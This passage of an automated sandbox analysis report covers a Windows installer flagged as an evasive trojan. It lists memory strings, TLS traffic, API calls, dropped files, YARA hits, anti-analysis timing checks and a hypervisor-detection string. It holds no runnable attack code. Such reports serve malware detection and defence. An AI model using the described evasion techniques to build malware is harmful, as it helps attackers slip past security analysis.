00000008.00000003.2881422435.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2256149763.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035369443.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.0000000007058000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2282761181.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035505872.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3063124661.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1809306009.00000000070CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.0000000007096000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2726603707.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2099822915.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1780419041.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2282761181.0000000007123000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1940578901.0000000007112000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035505872.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2436407199.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1940532305.00000000070A9000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1967489354.00000000070A9000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144397489.000000000711A000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2881422435.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2256149763.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035369443.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.0000000007058000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2282761181.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035505872.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3063124661.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1809306009.00000000070CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.0000000007096000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2726603707.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2099822915.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1780419041.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2282761181.0000000007123000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1940578901.0000000007112000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035505872.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2436407199.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1940532305.00000000070A9000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1967489354.00000000070A9000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144397489.000000000711A000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2881422435.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2256149763.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035369443.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.0000000007058000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2282761181.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035505872.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3063124661.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1809306009.00000000070CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.0000000007096000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2726603707.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2099822915.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1780419041.00000000070CC000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2282761181.0000000007123000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1940578901.0000000007112000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035505872.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2436407199.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1940532305.00000000070A9000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1967489354.00000000070A9000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144397489.000000000711A000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2881422435.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2256149763.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035369443.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.0000000007058000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.2282761181.000000000711E000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3035505872.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.3063124661.0000000007122000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1809306009.00000000070CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
      Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
      Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49751 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.7:49760 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49859 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49896 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.7:49903 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49932 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49969 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49986 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49990 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.7:49991 version: TLS 1.2
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeCode function: 4_2_00405331 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_00405331
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeCode function: 4_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,4_2_0040335A
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeCode function: 8_2_0040335A EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,8_2_0040335A
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeFile created: C:\Windows\resources\0809Jump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeCode function: 4_2_00404B6E4_2_00404B6E
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeCode function: 4_2_0040659D4_2_0040659D
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeCode function: 8_2_00404B6E8_2_00404B6E
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeCode function: 8_2_0040659D8_2_0040659D
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeCode function: String function: 00402B3A appears 51 times
      Source: ME-SPC-94.03.60.175.07.exe, 00000004.00000000.1278167937.000000000044A000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamebiliousnesses.exeDVarFileInfo$ vs ME-SPC-94.03.60.175.07.exe
      Source: ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamebiliousnesses.exeDVarFileInfo$ vs ME-SPC-94.03.60.175.07.exe
      Source: ME-SPC-94.03.60.175.07.exeBinary or memory string: OriginalFilenamebiliousnesses.exeDVarFileInfo$ vs ME-SPC-94.03.60.175.07.exe
      Source: ME-SPC-94.03.60.175.07.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal68.troj.evad.winEXE@3/10@2/2
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeCode function: 4_2_00404635 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,4_2_00404635
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeCode function: 4_2_0040206A LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,4_2_0040206A
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeFile created: C:\Users\user\subacidity.lnkJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsw4A52.tmpJump to behavior
      Source: ME-SPC-94.03.60.175.07.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: ME-SPC-94.03.60.175.07.exeReversingLabs: Detection: 55%
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeFile read: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe "C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeProcess created: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe "C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeProcess created: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe "C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"Jump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: subacidity.lnk.4.drLNK file: ..\..\Program Files (x86)\Common Files\cutline.sil
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeFile written: C:\Users\user\AppData\Local\Temp\tmc.iniJump to behavior
      Source: ME-SPC-94.03.60.175.07.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

      Data Obfuscation

      barindex
      Source: Yara matchFile source: 00000008.00000002.3137684124.0000000005DE6000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.1471777576.0000000009256000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeCode function: 4_2_004062B2 GetModuleHandleA,LoadLibraryA,GetProcAddress,4_2_004062B2
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeCode function: 4_2_10002DE0 push eax; ret 4_2_10002E0E
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeFile created: C:\Users\user\AppData\Local\Temp\nsh56A9.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeAPI/Special instruction interceptor: Address: 98FE1FA
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeAPI/Special instruction interceptor: Address: 648E1FA
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeRDTSC instruction interceptor: First address: 98C4FAE second address: 98C4FAE instructions: 0x00000000 rdtsc 0x00000002 cmp ax, dx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F4F44F0F037h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeRDTSC instruction interceptor: First address: 6454FAE second address: 6454FAE instructions: 0x00000000 rdtsc 0x00000002 cmp ax, dx 0x00000005 cmp ebx, ecx 0x00000007 jc 00007F4F44F0A897h 0x00000009 inc ebp 0x0000000a inc ebx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsh56A9.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe TID: 6444Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeCode function: 4_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_004057D0
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeCode function: 4_2_0040628B FindFirstFileW,FindClose,4_2_0040628B
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeCode function: 4_2_00402770 FindFirstFileW,4_2_00402770
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeCode function: 8_2_00402770 FindFirstFileW,8_2_00402770
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeCode function: 8_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_004057D0
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeCode function: 8_2_0040628B FindFirstFileW,FindClose,8_2_0040628B
      Source: ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.0000000007096000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1967489354.00000000070BC000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1940532305.00000000070A9000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1967489354.00000000070A9000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.00000000070BC000.00000004.00000020.00020000.00000000.sdmp, ME-SPC-94.03.60.175.07.exe, 00000008.00000003.1940532305.00000000070BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: ME-SPC-94.03.60.175.07.exe, 00000008.00000002.3144076442.0000000007058000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeAPI call chain: ExitProcess graph end nodegraph_4-4755
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeAPI call chain: ExitProcess graph end nodegraph_4-4756
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeCode function: 4_2_00401752 lstrcatW,CompareFileTime,LdrInitializeThunk,SetFileTime,CloseHandle,lstrcatW,4_2_00401752
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeCode function: 4_2_004062B2 GetModuleHandleA,LoadLibraryA,GetProcAddress,4_2_004062B2
      Source: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exeProcess created: C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe "C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"Jump to behavior
